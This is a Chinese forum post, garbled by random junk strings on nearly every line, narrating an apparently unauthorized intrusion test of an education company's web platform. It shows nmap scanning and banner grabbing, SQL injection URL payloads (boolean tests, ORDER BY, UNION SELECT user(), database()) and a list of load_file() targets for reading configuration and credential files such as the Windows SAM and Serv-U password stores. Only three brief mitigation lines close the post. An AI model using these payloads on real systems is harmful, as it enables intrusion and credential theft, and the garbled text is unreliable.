找回密码
 立即注册
查看: 2499|回复: 0
打印 上一主题 下一主题

记一次Linux系统PHP注入入侵检测

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 22:23:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
题记:
3 W( q5 c/ a7 t1 t7 ~' P7 l; D一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……, b/ O& P0 q  p
第一步:获取需要的信息
- J0 o; f% `) P0 K7 n/ f由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。, E+ e. d$ q$ m0 @* p8 b! b
注:以下为保护特用XXX代替敏感信息- W5 W! J5 A; H3 e5 ~! z
顺手先PING了一下他们的域名:
  {" ~6 o, W* B- S1 m) V6 Hping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)
, Z' p$ M6 q" a# M64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms6 B. l& j9 z. b! v0 K& w7 G
顺便了解一下TTL,学好基础知识才能一路顺风:; g" p" p- A5 g  N' p5 r% X
TTL:(Time To Live ) 生存时间9 D# U9 ?6 `( l/ E, n
指定数据包被路由器丢弃之前允许通过的网段数量。/ s7 S% f! u% D8 b$ H( G3 r
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。
% ~8 u4 c& u# B. g; B- c使用PING时涉及到的 ICMP 报文类型$ f/ E: O3 H3 o
一个为ICMP请求回显(ICMP Echo Request)9 [6 S5 R: j  C; j
一个为ICMP回显应答(ICMP Echo Reply)
, u( U: a% q1 D% K6 S) O$ T1 \TTL 字段值可以帮助我们识别操作系统类型。: m/ F9 b, t! Y; R
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
% R8 G. ^) n+ B5 Q# {Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
6 p1 Z5 z1 B$ h4 m) S0 [$ r微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 1285 C: Q& Z& q, b3 J% M# m, `9 i
微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32
; R9 l+ `7 T' ]( ^当然,返回的TTL值是相同的
1 M3 A/ R7 e1 \; ]但有些情况下有所特殊
4 N* s0 s( |; ?' }; t% [) Y6 JLINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64" X( K/ l: G2 [$ Q  m+ u0 X$ h7 L
FreeBSD 4.1, 4.0, 3.4;$ J* r# m! y- p) }* a$ s/ g
Sun Solaris 2.5.1, 2.6, 2.7, 2.8;
. M! ~# r, H. e# i: S* `  LOpenBSD 2.6, 2.7,; _7 H* k3 w5 g7 w8 p
NetBSD; P5 u. J' {2 U; z5 Y' y2 G1 k
HP UX 10.20
# O* D5 i) D& G, s  J( x& oICMP 回显应答的 TTL 字段值为 255
/ A7 s' A6 s; E& M* @2 GWindows 95/98/98SE: o% V0 a2 {  K7 l* i
Windows ME( l% E9 \2 w& m& s
ICMP 回显应答的 TTL 字段值为 32
' C; ]1 q' T2 m6 h# w' \0 i4 dWindows NT4 WRKS8 F4 m& q/ l2 K& a5 ]
Windows NT4 Server
% L3 m: n$ l9 N0 N4 h* k2 E; SWindows 2000
" A8 m% Z' S/ z& i) I. B; vWindows XP$ ?. |! J0 {: j/ r/ `& f' s6 u5 P
ICMP 回显应答的 TTL 字段值为 1286 m. P/ j0 L: f4 k4 R( U
这样,我们就可以通过这种方法来辨别操作系统
1 F% K  G% |& V) P* vTTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255$ e  Y& [  l1 r, h$ H
用NMAP扫描一下:
* P" l7 O! e0 Y4 ?nmap -sT -O XXX.XXX.XXX.XXX
" O- e: v; k1 H$ C- {如果没有装WinPcap则会弹出提示:" O+ P6 \, P" i/ B7 {. `8 ?1 U
WARNING: Could not import all necessary WinPcap functions.  You may need to upgr2 q- e  [4 ~" V% G/ F) Z3 Z7 y
ade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(
4 S! n* ]; r* i; T! g* O) g) mode — Nmap may not function completely# {1 J: h6 |( o: L- ]
TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher
. ?4 v( X) W1 l/ s8 A& M3 Uand iphlpapi.dll be installed. You seem to be missing one or both of these.  Win
+ z1 `3 P8 I& C% l. O, l( {. E7 ipcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an
1 n. ?7 p8 ]; [6 ?0 w5 vd later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v
8 `: P6 u% m( Y; U: l/ Y) r+ {ersions, you may be able to take iphlpapi.dll from another system and place it i2 }$ Q: U6 z0 M, I/ I, n% {. b. }
n your system32 dir (e.g. c:\windows\system32).
0 t6 J: R* m; y* v) N1 R( B; RQUITTING!
4 G: _" o# g/ [# B& s到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
9 s7 O, ]  }2 G7 a' z) i6 v! k4 F# a安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:2 `7 O8 J" q: X: F
Interesting ports on XXX.XXX.XXX.XXX:
" N7 u# N) ~9 R4 ~, O3 x" U' iNot shown: 986 closed ports7 P3 I0 J8 `( N2 ~8 U* S
PORT     STATE    SERVICE2 A: t* C" @+ x2 T/ t. l5 Q
21/tcp   open     ftp+ V' O' \# y5 f5 \
22/tcp   open     ssh
! f7 \4 |6 p4 y; L1 w# Y23/tcp   open     telnet! C, r4 e% O- `1 g0 ^
80/tcp   open     http% ?. ]) }5 n: h, J& I1 o# }
111/tcp  open     rpcbind
" Z0 I' F! W2 v135/tcp  filtered msrpc9 z+ J+ M1 d- m; Z
139/tcp  filtered netbios-ssn& H! O0 e; f0 Q* Z5 N6 _, J. S
445/tcp  filtered microsoft-ds6 W+ E+ {  s! w' ]! _6 r
513/tcp  open     login5 `) j3 }6 w1 e  ]2 L9 X7 [
514/tcp  open     shell
  ~6 Q; c3 c! y) M593/tcp  filtered http-rpc-epmap2 h; O1 C; f! u( L0 T
1720/tcp filtered H.323/Q.931
7 l, ?; u3 u, `& ]( w: t. D3306/tcp open     mysql9 q4 d2 a7 f, q. V7 Z2 ]2 w/ y$ g
4444/tcp filtered krb524
0 u; l0 y" X+ YDevice type: WAP. W8 V& A' m1 H, c- d: R
Running: Linux 2.4.X
) [  g- I0 _$ j* i& kOS details: DD-WRT (Linux 2.4.35s)) l0 S9 p0 x: @9 p2 z) b
Network Distance: 13 hops
# w0 |7 `! `$ ~2 K, W9 \看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
0 b6 L/ {" R# @4 o" Alogin as:( {; g3 G  k! F5 N9 e3 c% R
Telnet23端口也是开着的,用telnet 命令链接一下:
, G" t4 i( }5 O( T9 H: Ltelnet XXX.XXX.XXX.XXX- x! P) D. ]5 l9 u/ \
提示:+ u% N% r* Z& p9 E. X4 t! w
Red Hat Enterprise Linux Server release 5.2 (Tikanga)) q; V9 e4 j" L  P+ n, m" c
Kernel 2.6.18-92.el5PAE on an i686
4 N* e: B" v1 G. l. ]' M& alogin:4 o* d9 s7 ^. s# n
获取HTTP头信息:# \( u8 Y2 n) x% q+ P. s) r+ v& p
在本地执行如下PHP代码2 Q3 q: B3 h4 x1 ~6 ~) f2 i
<?php
$ T3 j" o2 R9 f2 T! D0 V+ y1 T/ o$url = ‘XXX.XXX.XXX.XXX’;
: f* p8 a" i, W3 f) S# kprint_r(get_headers($url));
* [! {% M& y, f8 `print_r(get_headers($url, 1));
- J& N8 \. h, K. W" o?>6 k, D# Z- [7 G
将以上代码保存为PHP文件,执行:
5 s* H( Q1 k" Z+ f! N& v- oArray ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
* E0 Q% X0 q1 N; W% E0 Q现在可以得出结论:2 J3 J* V9 c6 z8 D3 y" O/ p. f( y
系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)2 h8 ]8 ]8 Q: c, h* w+ @/ t) b3 P. ~
内核版本:Kernel 2.6.18-92.el5PAE on an i686
% N2 {. F; R9 NWEB服务器版本:nginx/0.7.61- W3 l; a4 e! p) [$ d- c" U
第二步,开始测试寻找漏洞2 Q0 w$ ~" ^- Q
分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。
( Q" A/ |# |! N8 m1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的
% r2 }, T9 i* j: ~- G0 t4 Y/ ]1 |2、测试方法:在地址后加 and 1=1 和 and 1=2 测试
; Z# L2 v  E# E7 i/ K2 W4 Yhttp://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常7 M; P5 Z! N, x1 F% e! ]
http://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误8 r- w$ B  q8 K& K, s8 P
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续6 [" a; X. B' O% ^. I5 Z2 \
3、手工注入:
% H0 m; p' |. f9 Y' [$ l5 W" o注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。! Z  g% w; @# K9 o& k& @: c' }
3.1 猜测当前表字段数6 ~/ D8 t+ U8 R$ Q7 V
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
" J# i# b0 @$ _& Z, Q此处猜测有个简单的算法,都是有技巧的吗,呵呵7 E) y+ V: |. _( H4 q
算法简单如下:" S, f4 u' R) f2 P* B& m# o" K
第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;8 L. V* g0 j# ~) P& P. v
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;; P8 ^2 [* ^& r4 ~" n
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。' W* e6 c" j" ]  ~
以此来判断,是否过界,配合取中算法猜出字段数。
$ }0 O' ^' Q0 K8 `: c举例:( ~6 U  e+ S* ]& A# \. }1 {$ U
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
2 G) W: L) L! T/ ohttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误
' Y) p5 `, Z* a% {) c# _此时3则为我们要找的字段数。$ f5 Q. k" b( V: f
3.2 配合union联合查询字段在页面所位置. B5 [0 V* n4 L4 a2 j
我们已经知道了字段数为3,此时则可以做如下操作:
' l) G: Y0 V+ ]3 U! P" j2 xhttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,34 `6 \# S& A! w3 X+ q
- C3 H8 B% _$ B9 \
这样就可以测试到哪些字段在页面上有所显示了,如图:" e' `, {9 B) r" z

* }2 t; U$ c5 V( v& z8 d7 F3.3 查敏感信息, f+ M" K  N# l* R- Q
这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。* _, _  b  v& P3 ^$ j
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
' a. h5 ~) r- F) o9 P) q* P+ f3.3.1 先查数据库用户、数据库名,以备后用,如图:  N( b$ B7 p$ y. y' E
9 t7 X# W$ ?. I. p* ]" e
得到数据库用户为root、数据库名为DBxx;* O/ Q! r- }3 a8 p6 A+ L$ ~
3.3.2 查配置文件
% w0 [% e4 e# U( J9 C' X) X查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。( p, f4 l6 ?) z% [: E# V/ f
查看文件有一定的条件限制:
5 {4 b: I: O3 o' g# M3 m; i欲读取文件必须在服务器上# D: ]) B5 v2 e9 e# g4 U0 L0 _
必须指定文件完整的路径/ X& W! {* i" F
必须有权限读取并且文件必须完全可读
* M, u4 f8 Y3 d0 B  B欲读取文件必须小于 max_allowed_packet9 l2 z2 f, }2 j' V
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。! y7 u: p* L/ e2 T$ N& f1 B; n* L
常用的一些:
! @) Q; z1 O' j9 |, s3 u2 Q9 B/ t/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件2 q6 d; c3 u. v! d; b
/usr/local/apache2/conf/httpd.conf6 G  G. N, K/ h% `; I
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置' [0 G- ?/ U& Z; |  d$ l
/usr/local/app/php5/lib/php.ini //PHP相关设置; K! d, K9 w0 N. s4 R
/etc/sysconfig/iptables //从中得到防火墙规则策略
) [% j" L5 e' [2 }2 w/ }( Z, b/etc/httpd/conf/httpd.conf // apache配置文件
, S* F6 B+ L' i0 h* w+ }/etc/rsyncd.conf //同步程序配置文件- w) @) g. d1 @4 P( z( H
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
3 E* K$ Z( l! K, d/etc/my.cnf //mysql的配置文件
. B5 W* @7 d& S! g: p0 U/etc/redhat-release //系统版本
. d$ k& c% k; p3 X/etc/issue
3 B; C/ a- v; U+ p; ]7 U5 U/etc/issue.net: k6 t! v' \6 K, m$ |+ ~- u
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码- x& R' H( z+ Y5 p5 [' P, y: _7 z
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
6 x; V+ C; l- g& ~3 Y+ z4 N% Ec:\Program Files\Serv-U\ServUDaemon.ini
/ j" D7 _  I  @6 g5 q% z# Xc:\windows\my.ini //MYSQL配置文件9 T! s$ `9 X* J4 @5 E. r3 c  g  S0 h
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件2 S9 n2 M" I' G1 x# Z
等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,/ J+ j7 g( }9 R% h9 o' W. T
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
8 ?0 k1 n  o3 k- Ic:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此( x, O9 l  B5 H  V2 e) h
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
, u# G9 [( ~" B% y! _: pC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件" c1 R/ v" M, |3 C- |2 _4 x& d
//存储了pcAnywhere的登陆密码$ [+ M/ X. B0 k! x; X
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。
* G2 |; |- K3 e: Y6 A这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。1 ?% U% q: _; S) C
最后:防范措施
' C0 G; @7 B6 I( H1 n( g) y1、修复PHP注入漏洞;
  z4 [2 D# N/ C* d1 ~2、Mysql使用普通权限的用户;. }: k, G' b& a8 R4 N
3、升级linux内核至最新版本;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表